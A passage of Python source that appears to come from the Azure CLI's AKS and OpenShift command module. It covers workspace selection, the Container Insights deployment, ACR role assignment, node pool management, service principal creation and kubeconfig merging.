# sanity check that locations and clouds match.
if ((cloud_name.lower() == 'azurecloud' and AzureChinaRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurecloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurecloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azurechinacloud' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azurechinacloud' and AzureFairfaxRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azurechinacloud) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if ((cloud_name.lower() == 'azureusgovernment' and AzureCloudRegionToOmsRegionMap.get(rg_location, False)) or
(cloud_name.lower() == 'azureusgovernment' and AzureChinaRegionToOmsRegionMap.get(rg_location, False))):
raise CLIError('Wrong cloud (azureusgovernment) setting for region {}, please use "az cloud set ..."'
.format(rg_location))
if cloud_name.lower() == 'azurecloud':
workspace_region = AzureCloudRegionToOmsRegionMap.get(
rg_location, "eastus")
workspace_region_code = AzureCloudLocationToOmsRegionCodeMap.get(
workspace_region, "EUS")
elif cloud_name.lower() == 'azurechinacloud':
workspace_region = AzureChinaRegionToOmsRegionMap.get(
rg_location, "chinaeast2")
workspace_region_code = AzureChinaLocationToOmsRegionCodeMap.get(
workspace_region, "EAST2")
elif cloud_name.lower() == 'azureusgovernment':
workspace_region = AzureFairfaxRegionToOmsRegionMap.get(
rg_location, "usgovvirginia")
workspace_region_code = AzureFairfaxLocationToOmsRegionCodeMap.get(
workspace_region, "USGV")
else:
workspace_region = rg_location
workspace_region_code = rg_location.upper()
default_workspace_resource_group = 'DefaultResourceGroup-' + workspace_region_code
default_workspace_name = 'DefaultWorkspace-{0}-{1}'.format(
subscription_id, workspace_region_code)
default_workspace_resource_id = '/subscriptions/{0}/resourceGroups/{1}/providers/Microsoft.OperationalInsights' \
'/workspaces/{2}'.format(subscription_id,
default_workspace_resource_group, default_workspace_name)
resource_groups = cf_resource_groups(cmd.cli_ctx, subscription_id)
resources = cf_resources(cmd.cli_ctx, subscription_id)
# check if default RG exists
if resource_groups.check_existence(default_workspace_resource_group):
try:
resource = resources.get_by_id(
default_workspace_resource_id, '2015-11-01-preview')
return resource.id
except CloudError as ex:
if ex.status_code != 404:
raise ex
else:
# TODO: track2/replace create_or_update with begin_create_or_update, depends on 'azure.mgmt.resource.resources'
resource_groups.create_or_update(default_workspace_resource_group, {
'location': workspace_region})
GenericResource = cmd.get_models(
'GenericResource', resource_type=ResourceType.MGMT_RESOURCE_RESOURCES)
generic_resource = GenericResource(location=workspace_region, properties={
'sku': {'name': 'standalone'}})
async_poller = resources.begin_create_or_update_by_id(default_workspace_resource_id, '2015-11-01-preview',
generic_resource)
ws_resource_id = ''
while True:
result = async_poller.result(15)
if async_poller.done():
ws_resource_id = result.id
break
return ws_resource_id
def _ensure_container_insights_for_monitoring(cmd, addon):
# Workaround for this addon key which has been seen lowercased in the wild.
for key in list(addon.config):
if (key.lower() == CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID.lower() and
key != CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID):
addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID] = addon.config.pop(
key)
workspace_resource_id = addon.config[CONST_MONITORING_LOG_ANALYTICS_WORKSPACE_RESOURCE_ID]
workspace_resource_id = workspace_resource_id.strip()
if not workspace_resource_id.startswith('/'):
workspace_resource_id = '/' + workspace_resource_id
if workspace_resource_id.endswith('/'):
workspace_resource_id = workspace_resource_id.rstrip('/')
# extract subscription ID and resource group from workspace_resource_id URL
try:
subscription_id = workspace_resource_id.split('/')[2]
resource_group = workspace_resource_id.split('/')[4]
except IndexError:
raise CLIError(
'Could not locate resource group in workspace-resource-id URL.')
# region of workspace can be different from region of RG so find the location of the workspace_resource_id
resources = cf_resources(cmd.cli_ctx, subscription_id)
try:
resource = resources.get_by_id(
workspace_resource_id, '2015-11-01-preview')
location = resource.location
except CloudError as ex:
raise ex
unix_time_in_millis = int(
(datetime.datetime.utcnow() - datetime.datetime.utcfromtimestamp(0)).total_seconds() * 1000.0)
solution_deployment_name = 'ContainerInsights-{}'.format(
unix_time_in_millis)
# pylint: disable=line-too-long
template = {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {
"workspaceResourceId": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics Resource ID"
}
},
"workspaceRegion": {
"type": "string",
"metadata": {
"description": "Azure Monitor Log Analytics workspace region"
}
},
"solutionDeploymentName": {
"type": "string",
"metadata": {
"description": "Name of the solution deployment"
}
}
},
"resources": [
{
"type": "Microsoft.Resources/deployments",
"name": "[parameters('solutionDeploymentName')]",
"apiVersion": "2017-05-10",
"subscriptionId": "[split(parameters('workspaceResourceId'),'/')[2]]",
"resourceGroup": "[split(parameters('workspaceResourceId'),'/')[4]]",
"properties": {
"mode": "Incremental",
"template": {
"$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
"contentVersion": "1.0.0.0",
"parameters": {},
"variables": {},
"resources": [
{
"apiVersion": "2015-11-01-preview",
"type": "Microsoft.OperationsManagement/solutions",
"location": "[parameters('workspaceRegion')]",
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"properties": {
"workspaceResourceId": "[parameters('workspaceResourceId')]"
},
"plan": {
"name": "[Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')')]",
"product": "[Concat('OMSGallery/', 'ContainerInsights')]",
"promotionCode": "",
"publisher": "Microsoft"
}
}
]
},
"parameters": {}
}
}
]
}
params = {
"workspaceResourceId": {
"value": workspace_resource_id
},
"workspaceRegion": {
"value": location
},
"solutionDeploymentName": {
"value": solution_deployment_name
}
}
deployment_name = 'aks-monitoring-{}'.format(unix_time_in_millis)
# publish the Container Insights solution to the Log Analytics workspace
return _invoke_deployment(cmd, resource_group, deployment_name, template, params,
validate=False, no_wait=False, subscription_id=subscription_id)
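# --- illustrative sketch (not part of the original command module) ---
# In the ARM template above the solution name is built with
# Concat('ContainerInsights', '(', split(parameters('workspaceResourceId'),'/')[8], ')'),
# i.e. "ContainerInsights(<workspaceName>)", because segment 8 of the resource ID
# is the workspace name. The hypothetical helper below mirrors that expression in
# plain Python so the template logic is easier to follow.
def _example_container_insights_solution_name(workspace_resource_id):
    # '/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.OperationalInsights/workspaces/<ws>'
    # .split('/') -> ['', 'subscriptions', '<sub>', 'resourceGroups', '<rg>',
    #                 'providers', 'Microsoft.OperationalInsights', 'workspaces', '<ws>']
    workspace_name = workspace_resource_id.split('/')[8]
    return 'ContainerInsights({})'.format(workspace_name)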
def _ensure_aks_acr(cmd,
client_id,
acr_name_or_id,
subscription_id,
detach=False):
from msrestazure.tools import is_valid_resource_id, parse_resource_id
# Check if the ACR exists by resource ID.
if is_valid_resource_id(acr_name_or_id):
try:
parsed_registry = parse_resource_id(acr_name_or_id)
acr_client = cf_container_registry_service(
cmd.cli_ctx, subscription_id=parsed_registry['subscription'])
registry = acr_client.registries.get(
parsed_registry['resource_group'], parsed_registry['name'])
except CloudError as ex:
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(
cmd, client_id, registry.id, detach)
return
    # Check if the ACR exists by name across all resource groups.
registry_name = acr_name_or_id
registry_resource = 'Microsoft.ContainerRegistry/registries'
try:
registry = get_resource_by_name(
cmd.cli_ctx, registry_name, registry_resource)
except CloudError as ex:
if 'was not found' in ex.message:
raise CLIError(
"ACR {} not found. Have you provided the right ACR name?".format(registry_name))
raise CLIError(ex.message)
_ensure_aks_acr_role_assignment(cmd, client_id, registry.id, detach)
return
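# --- illustrative sketch (not part of the original command module) ---
# _ensure_aks_acr accepts either a full ACR resource ID or a bare registry name.
# A minimal sketch of how the two inputs are told apart with msrestazure.tools;
# the example identifiers are made up.
def _example_acr_input_kind(acr_name_or_id):
    from msrestazure.tools import is_valid_resource_id, parse_resource_id
    if is_valid_resource_id(acr_name_or_id):
        # e.g. '/subscriptions/<sub>/resourceGroups/<rg>/providers/Microsoft.ContainerRegistry/registries/<name>'
        parsed = parse_resource_id(acr_name_or_id)
        return ('resource-id', parsed['subscription'], parsed['resource_group'], parsed['name'])
    # a bare name such as 'myregistry' falls through to the cross-resource-group lookup
    return ('name', None, None, acr_name_or_id)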
def aks_agentpool_show(cmd, client, resource_group_name, cluster_name, nodepool_name):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
return instance
def aks_agentpool_list(cmd, client, resource_group_name, cluster_name):
return client.list(resource_group_name, cluster_name)
def aks_agentpool_add(cmd, client, resource_group_name, cluster_name, nodepool_name,
kubernetes_version=None,
zones=None,
enable_node_public_ip=False,
node_public_ip_prefix_id=None,
node_vm_size=None,
node_osdisk_type=None,
node_osdisk_size=0,
node_count=3,
vnet_subnet_id=None,
ppg=None,
max_pods=0,
os_type="Linux",
min_count=None,
max_count=None,
enable_cluster_autoscaler=False,
node_taints=None,
priority=CONST_SCALE_SET_PRIORITY_REGULAR,
eviction_policy=CONST_SPOT_EVICTION_POLICY_DELETE,
spot_max_price=float('nan'),
tags=None,
labels=None,
max_surge=None,
mode="User",
enable_encryption_at_host=False,
enable_ultra_ssd=False,
no_wait=False):
AgentPool = cmd.get_models('AgentPool',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name == nodepool_name:
raise CLIError("Node pool {} already exists, please try a different name, "
"use 'aks nodepool list' to get current list of node pool".format(nodepool_name))
upgradeSettings = AgentPoolUpgradeSettings()
taints_array = []
if node_taints is not None:
for taint in node_taints.split(','):
try:
taint = taint.strip()
taints_array.append(taint)
except ValueError:
raise CLIError(
'Taint does not match allowed values. Expect value such as "special=true:NoSchedule".')
if node_vm_size is None:
if os_type.lower() == "windows":
node_vm_size = "Standard_D2s_v3"
else:
node_vm_size = "Standard_DS2_v2"
if max_surge:
upgradeSettings.max_surge = max_surge
agent_pool = AgentPool(
name=nodepool_name,
tags=tags,
node_labels=labels,
count=int(node_count),
vm_size=node_vm_size,
os_type=os_type,
vnet_subnet_id=vnet_subnet_id,
proximity_placement_group_id=ppg,
agent_pool_type="VirtualMachineScaleSets",
max_pods=int(max_pods) if max_pods else None,
orchestrator_version=kubernetes_version,
availability_zones=zones,
scale_set_priority=priority,
enable_node_public_ip=enable_node_public_ip,
node_public_ip_prefix_id=node_public_ip_prefix_id,
node_taints=taints_array,
upgrade_settings=upgradeSettings,
enable_encryption_at_host=enable_encryption_at_host,
enable_ultra_ssd=enable_ultra_ssd,
mode=mode
)
if priority == CONST_SCALE_SET_PRIORITY_SPOT:
agent_pool.scale_set_eviction_policy = eviction_policy
if isnan(spot_max_price):
spot_max_price = -1
agent_pool.spot_max_price = spot_max_price
_check_cluster_autoscaler_flag(
enable_cluster_autoscaler, min_count, max_count, node_count, agent_pool)
if node_osdisk_size:
agent_pool.os_disk_size_gb = int(node_osdisk_size)
if node_osdisk_type:
agent_pool.os_disk_type = node_osdisk_type
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
agent_pool,
)
def aks_agentpool_scale(cmd, client, resource_group_name, cluster_name,
nodepool_name,
node_count=3,
no_wait=False):
instance = client.get(resource_group_name, cluster_name, nodepool_name)
new_node_count = int(node_count)
if instance.enable_auto_scaling:
raise CLIError("Cannot scale cluster autoscaler enabled node pool.")
if new_node_count == instance.count:
raise CLIError(
"The new node count is the same as the current node count.")
instance.count = new_node_count # pylint: disable=no-member
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_upgrade(cmd, client, resource_group_name, cluster_name,
nodepool_name,
kubernetes_version='',
node_image_only=False,
max_surge=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings', operation_group='agent_pools')
if kubernetes_version != '' and node_image_only:
raise CLIError(
'Conflicting flags. Upgrading the Kubernetes version will also '
'upgrade node image version. If you only want to upgrade the '
'node version please use the "--node-image-only" option only.'
)
if node_image_only:
return _upgrade_single_nodepool_image_version(no_wait,
client,
resource_group_name,
cluster_name,
nodepool_name)
instance = client.get(resource_group_name, cluster_name, nodepool_name)
instance.orchestrator_version = kubernetes_version
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_update(cmd, client, resource_group_name, cluster_name, nodepool_name,
enable_cluster_autoscaler=False,
disable_cluster_autoscaler=False,
update_cluster_autoscaler=False,
min_count=None, max_count=None,
tags=None,
max_surge=None,
mode=None,
no_wait=False):
AgentPoolUpgradeSettings = cmd.get_models('AgentPoolUpgradeSettings',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='agent_pools')
update_autoscaler = enable_cluster_autoscaler + \
disable_cluster_autoscaler + update_cluster_autoscaler
if update_autoscaler > 1:
raise CLIError('Please specify one of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler"')
if (update_autoscaler == 0 and not tags and not mode and not max_surge):
raise CLIError('Please specify one or more of "--enable-cluster-autoscaler" or '
'"--disable-cluster-autoscaler" or '
'"--update-cluster-autoscaler" or '
'"--tags" or "--mode" or "--max-surge"')
instance = client.get(resource_group_name, cluster_name, nodepool_name)
_validate_autoscaler_update_counts(min_count, max_count, enable_cluster_autoscaler or
update_cluster_autoscaler)
if enable_cluster_autoscaler:
if instance.enable_auto_scaling:
logger.warning('Autoscaler is already enabled for this node pool.\n'
'Please run "az aks nodepool update --update-cluster-autoscaler" '
'if you want to update min-count or max-count.')
return None
instance.min_count = int(min_count)
instance.max_count = int(max_count)
instance.enable_auto_scaling = True
if update_cluster_autoscaler:
if not instance.enable_auto_scaling:
raise CLIError('Autoscaler is not enabled for this node pool.\n'
'Run "az aks nodepool update --enable-cluster-autoscaler" '
                           'to enable the cluster autoscaler with min-count and max-count.')
instance.min_count = int(min_count)
instance.max_count = int(max_count)
if not instance.upgrade_settings:
instance.upgrade_settings = AgentPoolUpgradeSettings()
if max_surge:
instance.upgrade_settings.max_surge = max_surge
if disable_cluster_autoscaler:
if not instance.enable_auto_scaling:
logger.warning(
'Autoscaler is already disabled for this node pool.')
return None
instance.enable_auto_scaling = False
instance.min_count = None
instance.max_count = None
instance.tags = tags
if mode is not None:
instance.mode = mode
return sdk_no_wait(
no_wait,
client.begin_create_or_update,
resource_group_name,
cluster_name,
nodepool_name,
instance,
)
def aks_agentpool_delete(cmd, client, resource_group_name, cluster_name,
nodepool_name,
no_wait=False):
agentpool_exists = False
instances = client.list(resource_group_name, cluster_name)
for agentpool_profile in instances:
if agentpool_profile.name.lower() == nodepool_name.lower():
agentpool_exists = True
break
if not agentpool_exists:
raise CLIError("Node pool {} doesnt exist, "
"use 'aks nodepool list' to get current node pool list".format(nodepool_name))
return sdk_no_wait(no_wait, client.begin_delete, resource_group_name, cluster_name, nodepool_name)
def aks_agentpool_get_upgrade_profile(cmd, client, resource_group_name, cluster_name, nodepool_name):
return client.get_upgrade_profile(resource_group_name, cluster_name, nodepool_name)
def _ensure_aks_acr_role_assignment(cmd,
client_id,
registry_id,
detach=False):
if detach:
if not _delete_role_assignments(cmd.cli_ctx,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not delete role assignments for ACR. '
'Are you an Owner on this subscription?')
return
if not _add_role_assignment(cmd,
'acrpull',
client_id,
scope=registry_id):
raise CLIError('Could not create a role assignment for ACR. '
'Are you an Owner on this subscription?')
return
def _ensure_aks_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
fqdn_subdomain=None,
location=None,
name=None):
aad_session_key = None
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
if dns_name_prefix:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
else:
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, fqdn_subdomain, location)
service_principal, aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
# We don't need to add role assignment for this created SPN
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
'aad_session_key': aad_session_key,
}
def _ensure_osa_aad(cmd,
cli_ctx,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
identifier=None,
name=None, create=False,
customer_admin_group_id=None):
OpenShiftManagedClusterAADIdentityProvider = cmd.get_models('OpenShiftManagedClusterAADIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
rbac_client = get_graph_rbac_management_client(cli_ctx)
if create:
        # This reply_url is temporarily set since Azure needs one to create the AAD application.
app_id_name = 'https://{}'.format(name)
if not aad_client_app_secret:
aad_client_app_secret = _create_client_secret()
# Delegate Sign In and Read User Profile permissions on Windows Azure Active Directory API
resource_access = ResourceAccess(id="311a71cc-e848-46a1-bdf8-97ff7156d8e6",
additional_properties=None, type="Scope")
# Read directory permissions on Windows Azure Active Directory API
directory_access = ResourceAccess(id="5778995a-e1bf-45b8-affa-663a9f3f4d04",
additional_properties=None, type="Role")
required_osa_aad_access = RequiredResourceAccess(resource_access=[resource_access, directory_access],
additional_properties=None,
resource_app_id="00000002-0000-0000-c000-000000000000")
list_aad_filtered = list(rbac_client.applications.list(filter="identifierUris/any(s:s eq '{}')"
.format(app_id_name)))
if list_aad_filtered:
aad_client_app_id = list_aad_filtered[0].app_id
# Updating reply_url with the correct FQDN information returned by the RP
reply_url = 'https://{}/oauth2callback/Azure%20AD'.format(
identifier)
update_application(client=rbac_client.applications,
object_id=list_aad_filtered[0].object_id,
display_name=name,
identifier_uris=[app_id_name],
reply_urls=[reply_url],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
logger.info('Updated AAD: %s', aad_client_app_id)
else:
result, _aad_session_key = create_application(client=rbac_client.applications,
display_name=name,
identifier_uris=[
app_id_name],
homepage=app_id_name,
password=aad_client_app_secret,
required_resource_accesses=[required_osa_aad_access])
aad_client_app_id = result.app_id
logger.info('Created an AAD: %s', aad_client_app_id)
# Get the TenantID
if aad_tenant_id is None:
profile = Profile(cli_ctx=cli_ctx)
_, _, aad_tenant_id = profile.get_login_credentials()
return OpenShiftManagedClusterAADIdentityProvider(
client_id=aad_client_app_id,
secret=aad_client_app_secret,
tenant_id=aad_tenant_id,
kind='AADIdentityProvider',
customer_admin_group_id=customer_admin_group_id)
def _ensure_service_principal(cli_ctx,
service_principal=None,
client_secret=None,
subscription_id=None,
dns_name_prefix=None,
location=None,
name=None):
# TODO: This really needs to be unit tested.
rbac_client = get_graph_rbac_management_client(cli_ctx)
if not service_principal:
# --service-principal not specified, make one.
if not client_secret:
client_secret = _create_client_secret()
salt = binascii.b2a_hex(os.urandom(3)).decode('utf-8')
url = 'https://{}.{}.{}.cloudapp.azure.com'.format(
salt, dns_name_prefix, location)
service_principal, _aad_session_key = _build_service_principal(
rbac_client, cli_ctx, name, url, client_secret)
if not service_principal:
raise CLIError('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
logger.info('Created a service principal: %s', service_principal)
        # add the role assignment first, before saving it
if not _add_role_assignment(cli_ctx, 'Contributor', service_principal):
logger.warning('Could not create a service principal with the right permissions. '
'Are you an Owner on this project?')
else:
        # --service-principal specified, validate --client-secret was too
if not client_secret:
raise CLIError(
'--client-secret is required if --service-principal is specified')
return {
'client_secret': client_secret,
'service_principal': service_principal,
}
def _create_client_secret():
# Add a special character to satisfy AAD SP secret requirements
special_char = '$'
client_secret = binascii.b2a_hex(
os.urandom(10)).decode('utf-8') + special_char
return client_secret
def _get_rg_location(ctx, resource_group_name, subscription_id=None):
groups = cf_resource_groups(ctx, subscription_id=subscription_id)
    # The get call will error out if the resource group doesn't exist; we only need its location.
rg = groups.get(resource_group_name)
return rg.location
def _check_cluster_autoscaler_flag(enable_cluster_autoscaler,
min_count,
max_count,
node_count,
agent_pool_profile):
if enable_cluster_autoscaler:
if min_count is None or max_count is None:
raise CLIError(
                'Please specify both min-count and max-count when --enable-cluster-autoscaler is enabled')
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count')
if int(node_count) < int(min_count) or int(node_count) > int(max_count):
raise CLIError(
'node-count is not in the range of min-count and max-count')
agent_pool_profile.min_count = int(min_count)
agent_pool_profile.max_count = int(max_count)
agent_pool_profile.enable_auto_scaling = True
else:
if min_count is not None or max_count is not None:
raise CLIError(
'min-count and max-count are required for --enable-cluster-autoscaler, please use the flag')
def _validate_autoscaler_update_counts(min_count, max_count, is_enable_or_update):
"""
Validates the min, max, and node count when performing an update
"""
if min_count is None or max_count is None:
if is_enable_or_update:
raise CLIError('Please specify both min-count and max-count when --enable-cluster-autoscaler or '
'--update-cluster-autoscaler is set.')
if min_count is not None and max_count is not None:
if int(min_count) > int(max_count):
raise CLIError(
'Value of min-count should be less than or equal to value of max-count.')
def _print_or_merge_credentials(path, kubeconfig, overwrite_existing, context_name):
"""Merge an unencrypted kubeconfig into the file at the specified path, or print it to
stdout if the path is "-".
"""
# Special case for printing to stdout
if path == "-":
print(kubeconfig)
return
# ensure that at least an empty ~/.kube/config exists
directory = os.path.dirname(path)
if directory and not os.path.exists(directory):
try:
os.makedirs(directory)
except OSError as ex:
if ex.errno != errno.EEXIST:
raise
if not os.path.exists(path):
with os.fdopen(os.open(path, os.O_CREAT | os.O_WRONLY, 0o600), 'wt'):
pass
# merge the new kubeconfig into the existing one
fd, temp_path = tempfile.mkstemp()
additional_file = os.fdopen(fd, 'w+t')
try:
additional_file.write(kubeconfig)
additional_file.flush()
merge_kubernetes_configurations(
path, temp_path, overwrite_existing, context_name)
except yaml.YAMLError as ex:
logger.warning(
'Failed to merge credentials to kube config file: %s', ex)
finally:
additional_file.close()
os.remove(temp_path)
def _remove_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags']
ap_attrs = ['os_disk_size_gb', 'vnet_subnet_id']
sp_attrs = ['secret']
for managed_cluster in managed_clusters:
for attr in attrs:
if getattr(managed_cluster, attr, None) is None:
delattr(managed_cluster, attr)
if managed_cluster.agent_pool_profiles is not None:
for ap_profile in managed_cluster.agent_pool_profiles:
for attr in ap_attrs:
if getattr(ap_profile, attr, None) is None:
delattr(ap_profile, attr)
for attr in sp_attrs:
if getattr(managed_cluster.service_principal_profile, attr, None) is None:
delattr(managed_cluster.service_principal_profile, attr)
return managed_clusters
def _remove_osa_nulls(managed_clusters):
"""
Remove some often-empty fields from a list of OpenShift ManagedClusters, so the JSON representation
doesn't contain distracting null fields.
    This works around a quirk of the Python SDK's behavior. These fields are not sent
by the server, but get recreated by the CLI's own "to_dict" serialization.
"""
attrs = ['tags', 'plan', 'type', 'id']
ap_master_attrs = ['name', 'os_type']
net_attrs = ['peer_vnet_id']
for managed_cluster in managed_clusters:
for attr in attrs:
if hasattr(managed_cluster, attr) and getattr(managed_cluster, attr) is None:
delattr(managed_cluster, attr)
for attr in ap_master_attrs:
if getattr(managed_cluster.master_pool_profile, attr, None) is None:
delattr(managed_cluster.master_pool_profile, attr)
for attr in net_attrs:
if getattr(managed_cluster.network_profile, attr, None) is None:
delattr(managed_cluster.network_profile, attr)
return managed_clusters
def _validate_aci_location(norm_location):
"""
Validate the Azure Container Instance location
"""
aci_locations = [
"australiaeast",
"canadacentral",
"centralindia",
"centralus",
"eastasia",
"eastus",
"eastus2",
"eastus2euap",
"japaneast",
"northcentralus",
"northeurope",
"southcentralus",
"southeastasia",
"southindia",
"uksouth",
"westcentralus",
"westus",
"westus2",
"westeurope"
]
if norm_location not in aci_locations:
raise CLIError('Azure Container Instance is not available at location "{}".'.format(norm_location) +
' The available locations are "{}"'.format(','.join(aci_locations)))
def osa_list(cmd, client, resource_group_name=None):
if resource_group_name:
managed_clusters = client.list_by_resource_group(resource_group_name)
else:
managed_clusters = client.list()
return _remove_osa_nulls(list(managed_clusters))
def _format_workspace_id(workspace_id):
workspace_id = workspace_id.strip()
if not workspace_id.startswith('/'):
workspace_id = '/' + workspace_id
if workspace_id.endswith('/'):
workspace_id = workspace_id.rstrip('/')
return workspace_id
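# --- illustrative sketch (not part of the original command module) ---
# _format_workspace_id only normalizes slashes; this hypothetical check shows
# the expected before/after shape with a made-up workspace resource ID.
def _example_format_workspace_id():
    raw = 'subscriptions/0000/resourceGroups/rg/providers/Microsoft.OperationalInsights/workspaces/ws/'
    # -> '/subscriptions/0000/resourceGroups/rg/providers/Microsoft.OperationalInsights/workspaces/ws'
    return _format_workspace_id(raw)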
def openshift_create(cmd, client, resource_group_name, name, # pylint: disable=too-many-locals
location=None,
compute_vm_size="Standard_D4s_v3",
compute_count=3,
aad_client_app_id=None,
aad_client_app_secret=None,
aad_tenant_id=None,
vnet_prefix="10.0.0.0/8",
subnet_prefix="10.0.0.0/24",
vnet_peer=None,
tags=None,
no_wait=False,
workspace_id=None,
customer_admin_group_id=None):
OpenShiftManagedClusterAgentPoolProfile = cmd.get_models('OpenShiftManagedClusterAgentPoolProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftAgentPoolProfileRole = cmd.get_models('OpenShiftAgentPoolProfileRole',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterIdentityProvider = cmd.get_models('OpenShiftManagedClusterIdentityProvider',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedCluster = cmd.get_models('OpenShiftManagedCluster',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftRouterProfile = cmd.get_models('OpenShiftRouterProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
NetworkProfile = cmd.get_models('NetworkProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterAuthProfile = cmd.get_models('OpenShiftManagedClusterAuthProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
OpenShiftManagedClusterMonitorProfile = cmd.get_models('OpenShiftManagedClusterMonitorProfile',
resource_type=ResourceType.MGMT_CONTAINERSERVICE,
operation_group='open_shift_managed_clusters')
logger.warning('Support for the creation of ARO 3.11 clusters ends 30 Nov 2020. Please see aka.ms/aro/4 for information on switching to ARO 4.') # pylint: disable=line-too-long
if location is None:
location = _get_rg_location(cmd.cli_ctx, resource_group_name)
agent_pool_profiles = []
agent_node_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='compute', # Must be 12 chars or less before ACS RP adds to it
count=int(compute_count),
vm_size=compute_vm_size,
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.compute,
subnet_cidr=subnet_prefix
)
agent_infra_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='infra', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
role=OpenShiftAgentPoolProfileRole.infra,
subnet_cidr=subnet_prefix
)
agent_pool_profiles.append(agent_node_pool_profile)
agent_pool_profiles.append(agent_infra_pool_profile)
agent_master_pool_profile = OpenShiftManagedClusterAgentPoolProfile(
name='master', # Must be 12 chars or less before ACS RP adds to it
count=int(3),
vm_size="Standard_D4s_v3",
os_type="Linux",
subnet_cidr=subnet_prefix
)
identity_providers = []
create_aad = False
    # Validate that the cluster does not already exist, since AAD rotation is not supported on OSA for now
try:
client.get(resource_group_name, name)
except CloudError:
        # Validate whether aad_client_app_id, aad_client_app_secret and aad_tenant_id are set
if aad_client_app_id is None and aad_client_app_secret is None and aad_tenant_id is None:
create_aad = True
osa_aad_identity = _ensure_osa_aad(cmd,
cmd.cli_ctx,
aad_client_app_id=aad_client_app_id,
aad_client_app_secret=aad_client_app_secret,
aad_tenant_id=aad_tenant_id, identifier=None,
name=name, create=create_aad,
customer_admin_group_id=customer_admin_group_id)
identity_providers.append(
OpenShiftManagedClusterIdentityProvider(
name='Azure AD',
provider=osa_aad_identity
)
)
auth_profile = OpenShiftManagedClusterAuthProfile(
identity_providers=identity_providers)
default_router_profile = OpenShiftRouterProfile(name='default')
if vnet_peer is not None:
from msrestazure.tools import is_valid_resource_id, resource_id
if not is_valid_resource_id(vnet_peer):
vnet_peer = resource_id(
subscription=get_subscription_id(cmd.cli_ctx),
resource_group=resource_group_name,
